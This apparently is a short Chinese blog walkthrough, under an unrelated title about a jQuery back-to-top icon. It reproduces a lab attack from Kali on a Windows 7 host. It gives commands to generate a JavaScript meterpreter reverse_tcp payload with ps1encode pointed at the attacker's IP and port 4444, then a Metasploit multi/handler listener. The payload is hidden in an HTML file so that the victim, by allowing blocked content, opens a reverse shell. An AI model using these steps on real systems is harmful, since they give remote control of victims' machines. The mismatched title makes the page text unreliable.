jQuery火箭图标返回顶部代码

0x01 模拟环境

攻击： kali
ip: 192.168.248.132
测试： windows 7 x64
ip: 192.168.248.136

0x02 工具地址

https://github.com/CroweCybersecurity/ps1encode

git clone https://github.com/CroweCybersecurity/ps1encode.git

0x03 漏洞复现

1.生成js脚本

./pslencode.rb --LHOST 192.168.248.132 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

复制文本放到文件中生成1.js文件

2.监听端口反弹shell

use exploit/multi/handler

3.windows执行文件

直接执行的话可能比较明显，所以参照文章我们写了一个1.html文件

4.执行1.html文件，选择运行->允许阻止内容->选择是，就反弹成功了

5.获取shell